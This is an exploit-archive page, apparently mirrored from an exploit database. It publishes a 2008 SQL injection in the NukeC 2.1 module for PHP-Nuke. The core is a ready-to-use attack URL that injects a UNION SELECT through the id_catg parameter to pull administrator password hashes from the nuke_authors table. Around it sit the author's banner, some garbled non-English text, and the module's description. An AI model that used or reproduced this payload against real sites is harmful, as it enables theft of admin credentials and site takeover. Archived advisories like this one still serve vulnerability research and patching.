PHP-Nuke Module NukeC 2.1 (id_catg) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP-Nuke Module NukeC 2.1 (id_catg) SQL Injection Vulnerability
# Published : 2008-02-21
# Author : DamaR
# Previous Title : OSSIM 0.9.9rc5 (XSS/SQL Injection) Multiple Remote Vulnerabilities
# Next Title : PHP-Nuke Modules Okul 1.0 (okulid) Remote SQL Injection Vulnerability

=-==-==-==-==-==-==-==D==A==M==A==R==-==-==-==-==-==-==-==-==-==-==-=

PHP-NUKE Modules NukeC Module's Version: 2.1 Remote SQL Injection

###################################################################################

 

Found: DamaR
contact: By.DamaR@Hotmail.Com

Hack Bitti ama D??nmek Yak?±n  Since 2000

i?§in yakla???±k 9.080 sonu?§tan 1 - 10 aras?± sonu?§lar (0,17 saniye)


###################################################################################

Exploit:

/modules.php?name=NukeC&op=ViewCatg&id_catg=-1/**/union/**/select/**/pwd,2/**/from/**/nuke_authors/*where%20admin%20-2

###################################################################################


Module Copyright ?? Information
NukeC module for PHP-Nuke


 Module's Name: NukeC
 Module's Version: 2.1
 Module's Description: NukeC - The Advanced Advertising System for PHP-Nuke.
NukeC Addon Module is addon module built for work on PHP-Nuke, the great web portal system.
NukeC is an advertising system that allows website visitors or members to sell something by posting the information about the item that they want to sell. With the admin sections, you could easily manage all of contents and preferences in NukeC Modules eventhough you are not a PHP programmer.
NukeC 2.1 is only work on PHP-Nuke 6.5. Please Download 2.0 or earlier for PHP-Nuke 6.0 or earlier nuke version
 License: GNU/GPL
 Author's Name: Sudirman Angriawan
 Author's Email: nukecpower@yahoo.com


###################################################################################

# www.Syue.com [2008-02-21]